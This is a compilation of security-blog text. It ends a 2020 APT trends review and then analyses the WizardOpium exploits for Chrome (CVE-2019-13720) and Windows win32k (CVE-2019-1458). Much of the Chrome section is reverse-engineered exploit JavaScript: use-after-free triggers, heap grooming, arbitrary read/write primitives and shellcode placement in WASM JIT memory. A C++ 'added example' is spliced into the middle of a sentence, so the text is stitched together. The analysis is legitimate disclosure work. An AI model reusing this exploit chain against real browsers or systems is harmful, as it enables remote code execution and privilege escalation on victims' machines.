We also found older Android malware that more closely resembles a backdoor, with traces of it in the wild dating back to August 2019.

In April, Cisco Talos described the activities of an unknown actor targeting Azerbaijan's government and energy sector using new malware called PoetRAT. In collaboration with Kaspersky ICS CERT, we identified supplementary samples of associated malware and documents with broader targeting of multiple universities, government and industrial organizations as well as entities in the energy sector in Azerbaijan. The campaign started in early November 2019, and the attackers switched off the infrastructure immediately following publication of the Cisco Talos report. We observed a small overlap in victimology with Turla, but since there is no technically sound proof of a relation between them, and we haven't been able to attribute this new set of activity to any other previously known actor, we named it Obsidian Gargoyle.

## Final thoughts

The TTPs of some threat actors remain fairly consistent over time (such as using hot topics, such as COVID-19, to entice users to download and execute malicious attachments sent in spear-phishing emails), while other groups reinvent themselves, developing new toolsets and widening their scope of activities, for example, to include new platforms. And while some threat actors develop [very sophisticated tools](<https://securelist.com/mosaicregressor/98849/>), for example, the MosaicRegressor UEFI implant, others [have great success](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) with basic TTPs.
Our regular quarterly reviews are intended to highlight the key developments of APT groups.

Here are the main trends that we've seen in Q3 2020:

* Geo-politics continues to drive the development of many APT campaigns, as seen in recent months in the activities of Transparent Tribe, Sidewinder, Origami Elephant and MosaicRegressor, and in the 'naming and shaming' of various threat actors by the NCSC and the US Department of Justice.
* Organizations in the financial sector also continue to attract attention: the activities of the mercenary group DeathStalker are a recent example.
* We continue to observe the use of mobile implants in APT attacks, with recent examples including Transparent Tribe and Origami Elephant.
* While APT threat actors remain active across the globe, recent hotspots of activity have been Southeast Asia, the Middle East and various regions affected by the activities of Chinese-speaking APT groups.
* Unsurprisingly, we continue to see COVID-19-themed attacks – this quarter they included WellMess and Sidewinder.
* Among the most interesting APT campaigns this quarter were DeathStalker and MosaicRegressor: the former underlining the fact that APT groups can achieve their aims without developing highly sophisticated tools; the latter representing the leading edge in malware development.

As always, we would note that our reports are the product of our visibility into the threat landscape.
However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.

APT trends report Q3 2020 (securelist, published 2020-11-03, https://securelist.com/apt-trends-report-q3-2020/99204/)

Next entry (securelist blog, last seen 2020-05-29; CVEs referenced: CVE-2010-2744, CVE-2016-7255, CVE-2019-0859, CVE-2019-13720, CVE-2019-1458):

Back in October 2019 we detected a classic watering-hole attack on a North Korea-related news site that exploited a chain of Google Chrome and Microsoft Windows zero-days. While we've already published blog posts briefly describing this operation (available [here](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) and [here](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>)), in this blog post we'd like to take a deep technical dive into the exploits and vulnerabilities used in this attack.

## Google Chrome remote code execution exploit

In the [original blog post](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) we described the exploit loader responsible for initial validation of the target and execution of the next-stage JavaScript code containing the full browser exploit. The exploit is huge because, besides code, it contains byte arrays with shellcode, a Portable Executable (PE) file and a WebAssembly (WASM) module used in the later stages of exploitation. The exploit abused a vulnerability in the WebAudio OfflineAudioContext interface and was targeting two release builds of Google Chrome, 76.0.3809.87 and 77.0.3865.75.
However, the vulnerability was introduced long before that and much earlier releases with a WebAudio component are also vulnerable. At the time of our discovery the current version of Google Chrome was 78, and while this version was also affected, the exploit did not support it and had a number of checks to ensure that it would only be executed on affected versions to prevent crashes. After our report, the vulnerability was assigned CVE-2019-13720 and was fixed in version 78.0.3904.87 with the following [commit](<https://chromium.googlesource.com/chromium/src.git/+/6a2e670a243b815cf043f8da4d26ecb9a64d307b>). A use-after-free (UAF) vulnerability, it could be triggered due to a race condition between the Render and Audio threads:

```diff
 if (!buffer) {
+	BaseAudioContext::GraphAutoLocker context_locker(Context());
+	MutexLocker locker(process_lock_);
 	reverb_.reset();
 	shared_buffer_ = nullptr;
 	return;
```

As you can see, when the audio buffer is set to null in ConvolverNode and an active buffer already exists within the Reverb object, the function SetBuffer() can destroy the reverb_ and shared_buffer_ objects.

```cpp
class MODULES_EXPORT ConvolverHandler final : public AudioHandler {
...
  std::unique_ptr<Reverb> reverb_;
  std::unique_ptr<SharedAudioBuffer> shared_buffer_;
...
```

These objects might still be in use by the Render thread because there is no proper synchronization between the two threads in the code. A patch added two missing locks (graph lock and process lock) for when the buffer is nullified.

The exploit code was obfuscated, but we were able to fully reverse engineer it and reveal all the small details. By looking at the code, we can see the author of the exploit has excellent knowledge of the internals of specific Google Chrome components, especially the [PartitionAlloc](<https://github.com/scrapy/base-chromium/blob/master/allocator/partition_allocator/PartitionAlloc.md>) memory allocator.
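The locking discipline the patch introduces, as an added example that is not Chromium's code: a minimal model of ConvolverHandler in which SetBuffer() on the main thread and Process() on the render thread both hold process_lock_, so the render thread can never observe reverb_ and shared_buffer_ mid-destruction. The class layout, the Reverb/SharedAudioBuffer stand-ins and RunRaceScenario() are assumptions modelled on the snippets above; the graph lock is omitted.

```cpp
// Added example (not Chromium code): models the ConvolverHandler race that
// CVE-2019-13720 fixed. The render thread calls Process() in a loop while the
// main thread sets the buffer to null and back, as the exploit's trigger loop
// does; with process_lock_ held on both sides no torn state is observable.
#include <atomic>
#include <cstddef>
#include <memory>
#include <mutex>
#include <thread>
#include <vector>

struct SharedAudioBuffer {                 // stand-in for blink's SharedAudioBuffer
  std::vector<float> samples;
  explicit SharedAudioBuffer(size_t n) : samples(n, 1.0f) {}
};

struct Reverb {                            // stand-in for blink's Reverb
  // Scratch memory the render thread writes into (cf. temporary_buffer_).
  std::vector<float> temporary_buffer;
  explicit Reverb(size_t n) : temporary_buffer(n, 0.0f) {}
  float Process(const SharedAudioBuffer& in) {
    float acc = 0.0f;
    for (size_t i = 0; i < in.samples.size() && i < temporary_buffer.size(); ++i) {
      temporary_buffer[i] = in.samples[i];
      acc += temporary_buffer[i];
    }
    return acc;
  }
};

class ConvolverHandler {
 public:
  // Main-thread side. Before the patch the null-buffer path reset reverb_ and
  // shared_buffer_ without taking process_lock_, so a concurrent Process()
  // could keep using the freed objects.
  void SetBuffer(std::shared_ptr<SharedAudioBuffer> buffer) {
    if (!buffer) {
      std::lock_guard<std::mutex> locker(process_lock_);  // the added lock
      reverb_.reset();
      shared_buffer_ = nullptr;
      return;
    }
    auto reverb = std::make_unique<Reverb>(buffer->samples.size());
    std::lock_guard<std::mutex> locker(process_lock_);
    reverb_ = std::move(reverb);
    shared_buffer_ = std::move(buffer);
  }

  // Render-thread side: returns false when there is nothing to process.
  bool Process(float* out) {
    std::lock_guard<std::mutex> locker(process_lock_);
    if (!reverb_ || !shared_buffer_) return false;
    *out = reverb_->Process(*shared_buffer_);
    return true;
  }

 private:
  std::mutex process_lock_;
  std::unique_ptr<Reverb> reverb_;
  std::shared_ptr<SharedAudioBuffer> shared_buffer_;
};

// Churns the buffer (null, then live) `iterations` times against a render
// thread that processes continuously. Returns the number of render passes that
// saw a complete 64-sample buffer (always at least 1), or 0 if the final
// Process() after the churn did not see a consistent buffer.
size_t RunRaceScenario(int iterations) {
  ConvolverHandler handler;
  auto channel = std::make_shared<SharedAudioBuffer>(64);
  std::atomic<bool> done{false};
  std::atomic<size_t> rendered{0};

  std::thread render([&] {
    while (!done.load()) {
      float out = 0.0f;
      if (handler.Process(&out) && out == 64.0f) rendered.fetch_add(1);
    }
  });
  for (int i = 0; i < iterations; ++i) {
    handler.SetBuffer(nullptr);
    handler.SetBuffer(channel);
  }
  handler.SetBuffer(channel);
  float out = 0.0f;
  bool ok = handler.Process(&out);  // a buffer is installed, so this must succeed
  done.store(true);
  render.join();
  return (ok && out == 64.0f) ? rendered.load() + 1 : 0;
}
```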
This can clearly be seen from the snippets of reverse engineered code below. These functions are used in the exploit to retrieve useful information from internal structures of the allocator, including: the SuperPage address, the PartitionPage address by index inside the SuperPage, the index of the used PartitionPage and the address of the PartitionPage metadata. All constants are taken from [partition_alloc_constants.h](<https://chromium.googlesource.com/chromium/src/+/master/base/allocator/partition_allocator/partition_alloc_constants.h>):

```javascript
function getSuperPageBase(addr) {
  let superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);
  let superPageBaseMask = ~superPageOffsetMask;
  let superPageBase = addr & superPageBaseMask;
  return superPageBase;
}

function getPartitionPageBaseWithinSuperPage(addr, partitionPageIndex) {
  let superPageBase = getSuperPageBase(addr);
  let partitionPageBase = partitionPageIndex << BigInt(14);
  let finalAddr = superPageBase + partitionPageBase;
  return finalAddr;
}

function getPartitionPageIndex(addr) {
  let superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);
  let partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14);
  return partitionPageIndex;
}

function getMetadataAreaBaseFromPartitionSuperPage(addr) {
  let superPageBase = getSuperPageBase(addr);
  let systemPageSize = BigInt(0x1000);
  return superPageBase + systemPageSize;
}

function getPartitionPageMetadataArea(addr) {
  let superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);
  let partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14);
  let pageMetadataSize = BigInt(0x20);
  let partitionPageMetadataPtr = getMetadataAreaBaseFromPartitionSuperPage(addr) + partitionPageIndex * pageMetadataSize;
  return partitionPageMetadataPtr;
}
```

It's interesting that the exploit also uses the relatively new built-in
[BigInt](<https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/BigInt>) class to handle 64-bit values; authors usually use their own primitives in exploits.

At first, the code initiates an OfflineAudioContext and creates a huge number of IIRFilterNode objects that are initialized via two float arrays.

```javascript
let gcPreventer = [];
let iirFilters = [];

function initialSetup() {
  let audioCtx = new OfflineAudioContext(1, 20, 3000);

  let feedForward = new Float64Array(2);
  let feedback = new Float64Array(1);

  feedback[0] = 1;
  feedForward[0] = 0;
  feedForward[1] = -1;

  for (let i = 0; i < 256; i++)
    iirFilters.push(audioCtx.createIIRFilter(feedForward, feedback));
}
```

After that, the exploit begins the initial stage of exploitation and tries to trigger a UAF bug. For that to work the exploit creates the objects that are needed for the Reverb component. It creates another huge OfflineAudioContext object and two ConvolverNode objects – a ScriptProcessorNode to start audio processing and an AudioBuffer for the audio channel.

```javascript
async function triggerUaF(doneCb) {
  let audioCtx = new OfflineAudioContext(2, 0x400000, 48000);
  let bufferSource = audioCtx.createBufferSource();
  let convolver = audioCtx.createConvolver();
  let scriptNode = audioCtx.createScriptProcessor(0x4000, 1, 1);
  let channelBuffer = audioCtx.createBuffer(1, 1, 48000);

  convolver.buffer = channelBuffer;
  bufferSource.buffer = channelBuffer;

  bufferSource.loop = true;
  bufferSource.loopStart = 0;
  bufferSource.loopEnd = 1;

  channelBuffer.getChannelData(0).fill(0);

  bufferSource.connect(convolver);
  convolver.connect(scriptNode);
  scriptNode.connect(audioCtx.destination);

  bufferSource.start();

  let finished = false;

  scriptNode.onaudioprocess = function(evt) {
    let channelDataArray = new Uint32Array(evt.inputBuffer.getChannelData(0).buffer);

    for (let j = 0; j < channelDataArray.length; j++) {
      if (j + 1 < channelDataArray.length && channelDataArray[j] != 0 && channelDataArray[j + 1] != 0) {
        let u64Array = new BigUint64Array(1);
        let u32Array = new Uint32Array(u64Array.buffer);
        u32Array[0] = channelDataArray[j + 0];
        u32Array[1] = channelDataArray[j + 1];

        let leakedAddr = byteSwapBigInt(u64Array[0]);
        if (leakedAddr >> BigInt(32) > BigInt(0x8000))
          leakedAddr -= BigInt(0x800000000000);
        let superPageBase = getSuperPageBase(leakedAddr);

        if (superPageBase > BigInt(0xFFFFFFFF) && superPageBase < BigInt(0xFFFFFFFFFFFF)) {
          finished = true;
          evt = null;

          bufferSource.disconnect();
          scriptNode.disconnect();
          convolver.disconnect();

          setTimeout(function() {
            doneCb(leakedAddr);
          }, 1);

          return;
        }
      }
    }
  };

  audioCtx.startRendering().then(function(buffer) {
    buffer = null;

    if (!finished) {
      finished = true;
      triggerUaF(doneCb);
    }
  });

  while (!finished) {
    convolver.buffer = null;
    convolver.buffer = channelBuffer;
    await later(100); // wait 100 milliseconds
  }
}
```

This function is executed recursively. It fills the audio channel buffer with zeros, starts rendering offline and at the same time runs a loop that nullifies and resets the channel buffer of the ConvolverNode object and tries to trigger a bug. The exploit uses the later() function to simulate the Sleep function, suspend the current thread and let the Render and Audio threads finish execution right on time:

```javascript
function later(delay) {
  return new Promise(resolve => setTimeout(resolve, delay));
}
```

During execution the exploit checks if the audio channel buffer contains any data that differs from the previously set zeroes.
The existence of such data would mean the UAF was triggered successfully and at this stage the audio channel buffer should contain a leaked pointer.

The PartitionAlloc memory allocator has a special exploit mitigation that works as follows: when the memory region is freed, it byteswaps the address of the pointer and after that the byteswapped address is added to the FreeList structure. This complicates exploitation because the attempt to dereference such a pointer will crash the process. To bypass this technique the exploit uses the following primitive that simply swaps the pointer back:

```javascript
function byteSwapBigInt(x) {
  let result = BigInt(0);
  let tmp = x;

  for (let i = 0; i < 8; i++) {
    result = result << BigInt(8);
    result += tmp & BigInt(0xFF);
    tmp = tmp >> BigInt(8);
  }

  return result;
}
```

The exploit uses the leaked pointer to get the address of the SuperPage structure and verifies it. If everything goes to plan, then it should be a raw pointer to a temporary_buffer_ object of the ReverbConvolverStage class that is passed to the callback function _initialUAFCallback_.

```javascript
let sharedAudioCtx;
let iirFilterFeedforwardAllocationPtr;

function initialUAFCallback(addr) {
  sharedAudioCtx = new OfflineAudioContext(1, 1, 3000);

  let partitionPageIndexDelta = undefined;
  switch (majorVersion) {
    case 77: // 77.0.3865.75
      partitionPageIndexDelta = BigInt(-26);
      break;
    case 76: // 76.0.3809.87
      partitionPageIndexDelta = BigInt(-25);
      break;
  }

  iirFilterFeedforwardAllocationPtr = getPartitionPageBaseWithinSuperPage(addr, getPartitionPageIndex(addr) + partitionPageIndexDelta) + BigInt(0xFF0);

  triggerSecondUAF(byteSwapBigInt(iirFilterFeedforwardAllocationPtr), finalUAFCallback);
}
```

The exploit uses the leaked pointer to get the address of the raw pointer to the _feedforward__ array with the AudioArray<double> type that is present in the IIRProcessor
object created with IIRFilterNode. This array should be located in the same SuperPage, but in different versions of Chrome this object is created in different PartitionPages and there is special code inside initialUAFCallback to handle that.

The vulnerability is actually triggered not once but twice. After the address of the right object is acquired, the vulnerability is exploited again. This time the exploit uses two AudioBuffer objects of different sizes, and the previously retrieved address is sprayed inside the larger AudioBuffer. This function also executes recursively.

```javascript
let floatArray = new Float32Array(10);
let audioBufferArray1 = [];
let audioBufferArray2 = [];
let imageDataArray = [];

async function triggerSecondUAF(addr, doneCb) {
  let counter = 0;
  let numChannels = 1;

  let audioCtx = new OfflineAudioContext(1, 0x100000, 48000);

  let bufferSource = audioCtx.createBufferSource();
  let convolver = audioCtx.createConvolver();

  let bigAudioBuffer = audioCtx.createBuffer(numChannels, 0x100, 48000);
  let smallAudioBuffer = audioCtx.createBuffer(numChannels, 0x2, 48000);

  smallAudioBuffer.getChannelData(0).fill(0);

  for (let i = 0; i < numChannels; i++) {
    let channelDataArray = new BigUint64Array(bigAudioBuffer.getChannelData(i).buffer);
    channelDataArray[0] = addr;
  }

  bufferSource.buffer = bigAudioBuffer;
  convolver.buffer = smallAudioBuffer;

  bufferSource.loop = true;
  bufferSource.loopStart = 0;
  bufferSource.loopEnd = 1;

  bufferSource.connect(convolver);
  convolver.connect(audioCtx.destination);

  bufferSource.start();

  let finished = false;

  audioCtx.startRendering().then(function(buffer) {
    buffer = null;

    if (finished) {
      audioCtx = null;

      setTimeout(doneCb, 200);
      return;
    } else {
      finished = true;

      setTimeout(function() {
        triggerSecondUAF(addr, doneCb);
      }, 1);
    }
  });

  while (!finished) {
    counter++;

    convolver.buffer = null;

    await later(1); // wait 1 millisecond

    if (finished)
      break;

    for (let i = 0; i < iirFilters.length; i++) {
      floatArray.fill(0);
      iirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray);

      if (floatArray[0] != 3.1415927410125732) {
        finished = true;

        audioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000));
        audioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000));

        bufferSource.disconnect();
        convolver.disconnect();

        return;
      }
    }

    convolver.buffer = smallAudioBuffer;

    await later(1); // wait 1 millisecond
  }
}
```

This time the exploit uses the function _getFrequencyResponse()_ to check if exploitation was successful. The function creates an array of frequencies that is filled with a Nyquist filter and the source array for the operation is filled with zeroes.

```cpp
void IIRDSPKernel::GetFrequencyResponse(int n_frequencies,
                                        const float* frequency_hz,
                                        float* mag_response,
                                        float* phase_response) {
...
  Vector<float> frequency(n_frequencies);
  double nyquist = this->Nyquist();
  // Convert from frequency in Hz to normalized frequency (0 -> 1),
  // with 1 equal to the Nyquist frequency.
  for (int k = 0; k < n_frequencies; ++k)
    frequency[k] = frequency_hz[k] / nyquist;
...
```

If the resulting array contains a value other than **π**, it means exploitation was successful. If that's the case, the exploit stops its recursion and executes the function _finalUAFCallback_ to allocate the audio channel buffer again and reclaim the previously freed memory. This function also repairs the heap to prevent possible crashes by allocating various objects of different sizes and performing defragmentation of the heap.
The exploit also creates BigUint64Array, which is used later to create an arbitrary read/write primitive.\n \n \n async function finalUAFCallback() {\n \tfor (let i = 0; i < 256; i++) {\n \t\tfloatArray.fill(0);\n \n \tiirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray);\n \n \t\tif (floatArray[0] != 3.1415927410125732) {\n \t\tawait collectGargabe();\n \n \t\taudioBufferArray2 = [];\n \n \t\tfor (let j = 0; j < 80; j++)\n \t\taudioBufferArray1.push(sharedAudioCtx.createBuffer(1, 2, 10000));\n \n \t\tiirFilters = new Array(1);\n \t \t\tawait collectGargabe();\n \n \t\tfor (let j = 0; j < 336; j++)\n \t\t\timageDataArray.push(new ImageData(1, 2));\n \t\timageDataArray = new Array(10);\n \t\tawait collectGargabe();\n \n \t\tfor (let j = 0; j < audioBufferArray1.length; j++) {\n \t\t\tlet auxArray = new BigUint64Array(audioBufferArray1[j].getChannelData(0).buffer);\n \t\t\tif (auxArray[0] != BigInt(0)) {\n \t\t\tkickPayload(auxArray);\n \t\t\treturn;\n \t\t\t}\n \t\t}\n \n \t\treturn;\n \t\t}\n \t}\n }\n\nHeap defragmentation is performed with multiple calls to the improvised _collectGarbage_ function that creates a huge ArrayBuffer in a loop.\n \n \n function collectGargabe() {\n \tlet promise = new Promise(function(cb) {\n \t\tlet arg;\n \t\tfor (let i = 0; i < 400; i++)\n \t\tnew ArrayBuffer(1024 * 1024 * 60).buffer;\n \t\tcb(arg);\n \t});\n \treturn promise;\n }\n\nAfter those steps, the exploit executes the function _kickPayload()_ passing the previously created BigUint64Array containing the raw pointer address of the previously freed AudioArray's data.\n \n \n async function kickPayload(auxArray) {\n \tlet audioCtx = new OfflineAudioContext(1, 1, 3000);\n \tlet partitionPagePtr = getPartitionPageMetadataArea(byteSwapBigInt(auxArray[0]));\n \tauxArray[0] = byteSwapBigInt(partitionPagePtr);\n \tlet i = 0;\n \tdo {\n \t\tgcPreventer.push(new ArrayBuffer(8));\n \t\tif (++i > 0x100000)\n \t\treturn;\n \t} while (auxArray[0] != BigInt(0));\n \tlet 
freelist = new BigUint64Array(new ArrayBuffer(8));\n \tgcPreventer.push(freelist);\n \t...\n\nThe exploit manipulates the PartitionPage metadata of the freed object to achieve the following behavior. If the address of another object is written in BigUint64Array at index zero and if a new 8-byte object is created and the value located at index 0 is read back, then a value located at the previously set address will be read. If something is written at index 0 at this stage, then this value will be written to the previously set address instead.\n \n \n function read64(rwHelper, addr) {\n \trwHelper[0] = addr;\n \tvar tmp = new BigUint64Array;\n \ttmp.buffer;\n \tgcPreventer.push(tmp);\n \treturn byteSwapBigInt(rwHelper[0]);\n }\n \n function write64(rwHelper, addr, value) {\n \trwHelper[0] = addr;\n \tvar tmp = new BigUint64Array(1);\n \ttmp.buffer;\n \ttmp[0] = value;\n \tgcPreventer.push(tmp);\n }\n\nAfter the building of the arbitrary read/write primitives comes the final stage \u2013 executing the code. The exploit achieves this by using a popular technique that exploits the Web Assembly (WASM) functionality. Google Chrome currently allocates pages for just-in-time (JIT) compiled code with read/write/execute (RWX) privileges and this can be used to overwrite them with shellcode. At first, the exploit initiates a \"dummy\" WASM module and it results in the allocation of memory pages for JIT compiled code.\n \n \n const wasmBuffer = new Uint8Array([...]);\n const wasmBlob = new Blob([wasmBuffer], {\n \ttype: \"application/wasm\"\n });\n \n const wasmUrl = URL.createObjectURL(wasmBlob);\n var wasmFuncA = undefined;\n WebAssembly.instantiateStreaming(fetch(wasmUrl), {}).then(function(result) {\n \twasmFuncA = result.instance.exports.a;\n });\n\nTo execute the exported function _wasmFuncA_, the exploit creates a FileReader object. When this object is initiated with data it creates a FileReaderLoader object internally. 
If you can parse PartitionAlloc allocator structures and know the size of the next object that will be allocated, you can predict which address it will be allocated to. The exploit uses the _getPartitionPageFreeListHeadEntryBySlotSize()_ function with the provided size and gets the address of the next free block that will be allocated by FileReaderLoader.\n \n \n let fileReader = new FileReader;\n let fileReaderLoaderSize = 0x140;\n let fileReaderLoaderPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize);\n if (!fileReaderLoaderPtr)\n \treturn;\n \n fileReader.readAsArrayBuffer(new Blob([]));\n \n let fileReaderLoaderTestPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize);\n if (fileReaderLoaderPtr == fileReaderLoaderTestPtr)\n \treturn;\n\nThe exploit obtains this address twice to find out if the FileReaderLoader object was created and if the exploit can continue execution. 
The exploit sets the exported WASM function to be a callback for a FileReader event (in this case, an onerror callback) and because the FileReader type is derived from EventTargetWithInlineData, it can be used to get the addresses of all its events and the address of the JIT compiled exported WASM function.\n \n \n fileReader.onerror = wasmFuncA;\n \n let fileReaderPtr = read64(freelist, fileReaderLoaderPtr + BigInt(0x10)) - BigInt(0x68);\n \n let vectorPtr = read64(freelist, fileReaderPtr + BigInt(0x28));\n let registeredEventListenerPtr = read64(freelist, vectorPtr);\n let eventListenerPtr = read64(freelist, registeredEventListenerPtr);\n let eventHandlerPtr = read64(freelist, eventListenerPtr + BigInt(0x8));\n let jsFunctionObjPtr = read64(freelist, eventHandlerPtr + BigInt(0x8));\n \n let jsFunctionPtr = read64(freelist, jsFunctionObjPtr) - BigInt(1);\n let sharedFuncInfoPtr = read64(freelist, jsFunctionPtr + BigInt(0x18)) - BigInt(1);\n let wasmExportedFunctionDataPtr = read64(freelist, sharedFuncInfoPtr + BigInt(0x8)) - BigInt(1);\n let wasmInstancePtr = read64(freelist, wasmExportedFunctionDataPtr + BigInt(0x10)) - BigInt(1);\n \n let stubAddrFieldOffset = undefined;\n switch (majorVersion) {\n \tcase 77:\n \t\tstubAddrFieldOffset = BigInt(0x8) * BigInt(16);\n \tbreak;\n \tcase 76:\n \t\tstubAddrFieldOffset = BigInt(0x8) * BigInt(17);\n \tbreak\n }\n \n let stubAddr = read64(freelist, wasmInstancePtr + stubAddrFieldOffset);\n\nThe variable stubAddr contains the address of the page with the stub code that jumps to the JIT compiled WASM function. At this stage it's sufficient to overwrite it with shellcode. To do so, the exploit uses the function _getPartitionPageFreeListHeadEntryBySlotSize()_ again to find the next free block of 0x20 bytes, which is the size of the structure for the ArrayBuffer object. 
This object is created when the exploit creates a new audio buffer.\n \n \n let arrayBufferSize = 0x20;\n let arrayBufferPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, arrayBufferSize);\n if (!arrayBufferPtr)\n \treturn;\n \n let audioBuffer = audioCtx.createBuffer(1, 0x400, 6000);\n gcPreventer.push(audioBuffer);\n\nThe exploit uses arbitrary read/write primitives to get the address of the DataHolder class that contains the raw pointer to the data and size of the audio buffer. The exploit overwrites this pointer with stubAddr and sets a huge size.\n \n \n let dataHolderPtr = read64(freelist, arrayBufferPtr + BigInt(0x8));\n \n write64(freelist, dataHolderPtr + BigInt(0x8), stubAddr);\n write64(freelist, dataHolderPtr + BigInt(0x10), BigInt(0xFFFFFFF));\n\nNow all that's needed is to implant a Uint8Array object into the memory of this audio buffer and place shellcode there along with the Portable Executable that will be executed by the shellcode.\n \n \n let payloadArray = new Uint8Array(audioBuffer.getChannelData(0).buffer);\n payloadArray.set(shellcode, 0);\n payloadArray.set(peBinary, shellcode.length);\n\nTo prevent the possibility of a crash the exploit clears the pointer to the top of the FreeList structure used by the PartitionPage.\n \n \n write64(freelist, partitionPagePtr, BigInt(0));\n\nNow, in order to execute the shellcode, it's enough to call the exported WASM function.\n \n \n try {\n \twasmFuncA();\n } catch (e) {}\n\n## Microsoft Windows elevation of privilege exploit\n\nThe shellcode appeared to be a Reflective PE loader for the Portable Executable module that was also present in the exploit. This module mostly consisted of the code to escape Google Chrome's sandbox by exploiting the Windows kernel component win32k for the elevation of privileges and it was also responsible for downloading and executing the actual malware. 
On closer analysis, we found that the exploited vulnerability was in fact a zero-day. We notified Microsoft Security Response Center and they assigned it CVE-2019-1458 and fixed the vulnerability. The win32k component has something of bad reputation. It has been present since Windows NT 4.0 and, according to Microsoft, it is responsible for more than 50% of all kernel security bugs. In the last two years alone Kaspersky has found five zero-days in the wild that exploited win32k vulnerabilities. That's quite an interesting statistic considering that since the release of Windows 10, Microsoft has implemented a number of mitigations aimed at complicating exploitation of win32k vulnerabilities and the majority of zero-days that we found exploited versions of Microsoft Windows prior to the release of Windows 10 RS4. The elevation of privilege exploit used in Operation WizardOpium was built to support Windows 7, Windows 10 build 10240 and Windows 10 build 14393. It's also important to note that Google Chrome has a special security feature called [Win32k lockdown](<https://googleprojectzero.blogspot.com/2016/11/breaking-chain.html>). This security feature eliminates the whole win32k attack surface by disabling access to win32k syscalls from inside Chrome processes. Unfortunately, Win32k lockdown is only supported on machines running Windows 10. So, it's fair to assume that Operation WizardOpium targeted users running Windows 7.\n\nCVE-2019-1458 is an Arbitrary Pointer Dereference vulnerability. In win32k Window objects are represented by a tagWND structure. There are also a number of classes based on this structure: ScrollBar, Menu, Listbox, Switch and many others. The FNID field of tagWND structure is used to distinguish the type of class. Different classes also have various extra data appended to the tagWND structure. This extra data is basically just different structures that often include kernel pointers. 
Besides that, in the win32k component there's a syscall SetWindowLongPtr that can be used to set this extra data (after validation of course). It's worth noting that SetWindowLongPtr was related to a number of vulnerabilities in the past (e.g., CVE-2010-2744, CVE-2016-7255, and CVE-2019-0859). There's a [common issue](<https://securelist.com/new-win32k-zero-day-cve-2019-0859/90435/>) when pre-initialized extra data can lead to system procedures incorrectly handling. In the case of CVE-2019-1458, the validation performed by SetWindowLongPtr was just insufficient.\n \n \n xxxSetWindowLongPtr(tagWND *pwnd, int index, QWORD data, ...)\n \t...\n \tif ( (int)index >= gpsi->mpFnid_serverCBWndProc[(pwnd->fnid & 0x3FFF) - 0x29A] - sizeof(tagWND) )\n \t\t...\n \t\textraData = (BYTE*)tagWND + sizeof(tagWND) + index\n \t\told = *(QWORD*)extraData;\n \t\t*(QWORD*)extraData = data;\n \t\treturn old;\n\nA check for the index parameter would have prevented this bug, but prior to the patch the values for FNID_DESKTOP, FNID_SWITCH, FNID_TOOLTIPS inside the mpFnid_serverCBWndProc table were not initialized, rendering this check useless and allowing the kernel pointers inside the extra data to be overwritten.\n\nTriggering the bug is quite simple: at first, you create a Window, then NtUserMessageCall can be used to call any system class window procedure.\n \n \n gpsi->mpFnidPfn[(dwType + 6) & 0x1F]((tagWND *)wnd, msg, wParam, lParam, resultInfo);\n\nIt's important to provide the right message and dwType parameters. The message needs to be equal to WM_CREATE. dwType is converted to fnIndex internally with the following calculation: (dwType + 6) & 0x1F. The exploit uses a dwType equal to 0xE0. 
It results in an fnIndex equal to 6 which is the function index of _xxxSwitchWndProc _and the WM_CREATE message sets the FNID field to be equal to FNID_SWITCH.\n \n \n LRESULT xxxSwitchWndProc(tagWND *wnd, UINT msg, WPARAM wParam, LPARAM lParam)\n {\n ...\n pti = *(tagTHREADINFO **)&gptiCurrent;\n if ( wnd->fnid != FNID_SWITCH )\n {\n if ( wnd->fnid || wnd->cbwndExtra + 296 < (unsigned int)gpsi->mpFnid_serverCBWndProc[6] )\n return 0i64;\n if ( msg != 1 )\n return xxxDefWindowProc(wnd, msg, wParam, lParam);\n if ( wnd[1].head.h )\n return 0i64;\n wnd->fnid = FNID_SWITCH;\n }\n switch ( msg )\n {\n case WM_CREATE:\n zzzSetCursor(wnd->pcls->spcur, pti, 0i64);\n break;\n case WM_CLOSE:\n xxxSetWindowPos(wnd, 0, 0);\n xxxCancelCoolSwitch();\n break;\n case WM_ERASEBKGND:\n case WM_FULLSCREEN:\n pti->ptl = (_TL *)&pti->ptl;\n ++wnd->head.cLockObj;\n xxxPaintSwitchWindow(wnd, pti, 0i64);\n ThreadUnlock1();\n return 0i64;\n }\n return xxxDefWindowProc(wnd, msg, wParam, lParam);\n }\n\nThe vulnerability in _NtUserSetWindowLongPtr_ can then be used to overwrite the extra data at index zero, which happens to be a pointer to a structure containing information about the Switch Window. In other words, the vulnerability makes it possible to set some arbitrary kernel pointer that will be treated as this structure.\n\nAt this stage it's enough to call _NtUserMessageCall_ again, but this time with a message equal to WM_ERASEBKGND. This results in the execution of the function _xxxPaintSwitchWindow_ that increments and decrements a couple of integers located by the pointer that we previously set.\n \n \n sub [rdi+60h], ebx\n add [rdi+68h], ebx\n ...\n sub [rdi+5Ch], ecx\n add [rdi+64h], ecx\n\nAn important condition for triggering the exploitable code path is that the ALT key needs to be pressed.\n\nExploitation is performed by abusing Bitmaps. For successful exploitation a few Bitmaps need to be allocated next to each other, and their kernel addresses need to be known. 
